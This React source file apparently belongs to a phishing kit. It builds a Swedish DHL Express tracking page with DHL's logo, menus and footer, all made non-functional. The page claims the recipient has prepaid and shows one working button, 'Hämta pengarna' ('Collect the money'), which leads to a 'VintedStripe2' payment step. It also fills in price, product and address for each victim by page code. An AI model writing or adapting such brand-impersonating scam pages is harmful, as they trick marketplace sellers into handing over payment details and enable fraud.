import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DhlSeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const DHL_LOGO = `${P}/dhl-se-logo.svg`;

function noop(e) {
  e.preventDefault();
}

const NAV_LEFT = [
  { label: 'Spåra', chevron: true },
  { label: 'Skicka', chevron: true },
  { label: 'Logistiklösningar', chevron: false },
  { label: 'Kundservice', chevron: false },
];

const FOOTER_COL_1 = {
  title: 'Hjälpcenter',
  links: ['Kundservice', 'Inloggning till kundportalen', 'Digitala partner och integreringar', 'Utvecklarportal'],
};
const FOOTER_COL_2 = {
  title: 'Våra divisioner',
  links: [
    'Post and Paket Deutschland',
    'DHL Express',
    'DHL Global Forwarding',
    'DHL Freight',
    'DHL Supply Chain',
    'DHL eCommerce',
  ],
};
const FOOTER_COL_3 = {
  title: 'Branschområden',
  links: [
    'Fordonsvärlden',
    'Kemikalier',
    'Konsumentvaror',
    'Energi',
    'Konstruktion och tillverkning',
    'Medicin och hälsovård',
    'Offentlig sektor',
    'Detaljhandel',
    'Teknologi',
  ],
};
const FOOTER_COL_4 = {
  title: 'Företagsinformation',
  links: ['Om DHL', 'Delivered', 'Karriär', 'Presscenter', 'Investerare', 'Hållbarhet', 'Insikter och innovation', 'Varumärkespartnerskap'],
};

const LEGAL_LINKS = [
  'Medvetenhet om bedrägerier',
  'Juridiskt meddelande',
  'Användningsvillkor',
  'Integritetspolicy',
  'Tvistlösning',
  'Ytterligare information',
  'Cookie Settings',
];

/**
 * DHL Express (SE) — spårning / förskottsbetalning, CTA → index2 (VintedStripe2).
 */
function DhlSeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'SEK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const trackingCode =
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.page_code && String(pageData.page_code).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    pageCode ||
    '—';

  const productRef = (pageData?.product_name || '').trim() || '—';
  const deliveryLine = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dhl-se-wrap" lang="sv">
        <div className="dhl-se-loading">Laddar…</div>
        <div className="dhl-se-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="dhl-se-wrap" lang="sv">
      <header className="dhl-se-header">
        <div className="dhl-se-header-inner">
          <a href="#/" className="dhl-se-logo-link" onClick={noop} aria-label="DHL">
            <img src={DHL_LOGO} alt="DHL" className="dhl-se-logo-img" width={90} height={26} />
          </a>
          <nav className="dhl-se-nav" aria-label="Huvudmeny">
            {NAV_LEFT.map((item) => (
              <a key={item.label} href="#/" className="dhl-se-nav-item" onClick={noop}>
                {item.label}
                {item.chevron ? <span className="dhl-se-chevron" aria-hidden /> : null}
              </a>
            ))}
          </nav>
          <div className="dhl-se-locale">
            <span className="dhl-se-globe" aria-hidden />
            Sverige
          </div>
        </div>
      </header>

      <main className="dhl-se-main">
        <h1 className="dhl-se-page-title">SPÅRA: EXPRESS</h1>

        <Link to={index2Path} className="dhl-se-cta">
          Hämta pengarna {amountLine}
        </Link>

        <section className="dhl-se-card" aria-labelledby="dhl-se-card-h">
          <h2 id="dhl-se-card-h" className="dhl-se-sr-only">
            Sändningsinformation
          </h2>
          <div className="dhl-se-card-top">
            <div>
              <p className="dhl-se-track-label">
                Spårningskod: <strong className="dhl-se-track-code">{trackingCode}</strong>
              </p>
              <p className="dhl-se-handled">Sändningen hanteras av: DHL Express</p>
            </div>
            <button type="button" className="dhl-se-print" onClick={noop}>
              <span className="dhl-se-print-ic" aria-hidden />
              Skriv ut
            </button>
          </div>

          <div className="dhl-se-status-block">
            <h3 className="dhl-se-status-h">Förskottsbetalning gjord</h3>
            <div className="dhl-se-progress" aria-hidden>
              <div className="dhl-se-progress-fill" />
              <div className="dhl-se-progress-rest" />
              <div className="dhl-se-progress-rest" />
            </div>
          </div>

          <div className="dhl-se-updates">
            <h3 className="dhl-se-updates-h">Alla sändningsuppdateringar</h3>
            <ul className="dhl-se-timeline">
              <li className="dhl-se-tl-item">
                <span className="dhl-se-tl-left">{productRef}</span>
                <span className="dhl-se-tl-mid" aria-hidden />
                <span className="dhl-se-tl-right dhl-se-tl-ok">Förskottsbetalning gjord av mottagaren.</span>
              </li>
              <li className="dhl-se-tl-item">
                <span className="dhl-se-tl-left">{amountLine}</span>
                <span className="dhl-se-tl-mid" aria-hidden />
                <div className="dhl-se-tl-right-wrap">
                  <span className="dhl-se-tl-right dhl-se-tl-ok">Paketuppgifterna har matats in i DHL-systemet.</span>
                  <span className="dhl-se-tl-sub">{deliveryLine}</span>
                </div>
              </li>
            </ul>
          </div>
        </section>

        <p className="dhl-se-contact-line">
          Om du hellre vill tala med någon personligen om din leveransplats kan du{' '}
          <a href="#/" onClick={noop}>
            kontakta kundtjänst för DHL Express
          </a>
          .
        </p>
      </main>

      <footer className="dhl-se-footer">
        <div className="dhl-se-footer-grid">
          {[FOOTER_COL_1, FOOTER_COL_2, FOOTER_COL_3, FOOTER_COL_4].map((col) => (
            <div key={col.title} className="dhl-se-footer-col">
              <h3 className="dhl-se-footer-title">{col.title}</h3>
              <ul className="dhl-se-footer-list">
                {col.links.map((l) => (
                  <li key={l}>
                    <a href="#/" onClick={noop}>
                      {l}
                    </a>
                  </li>
                ))}
              </ul>
            </div>
          ))}
        </div>

        <div className="dhl-se-footer-bottom">
          <div className="dhl-se-footer-brand">DHL Group</div>
          <nav className="dhl-se-legal" aria-label="Juridik">
            {LEGAL_LINKS.map((l) => (
              <a key={l} href="#/" onClick={noop}>
                {l}
              </a>
            ))}
          </nav>
          <div className="dhl-se-follow">
            <strong>Följ oss</strong>
            <div className="dhl-se-social">
              <span className="dhl-se-soc" aria-hidden>
                ▶
              </span>
              <span className="dhl-se-soc" aria-hidden>
                f
              </span>
              <span className="dhl-se-soc" aria-hidden>
                in
              </span>
              <span className="dhl-se-soc" aria-hidden>
                ◎
              </span>
            </div>
          </div>
          <p className="dhl-se-copy">2025 © - all rights reserved</p>
        </div>
      </footer>

      <div className="dhl-se-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default DhlSeSuccess;
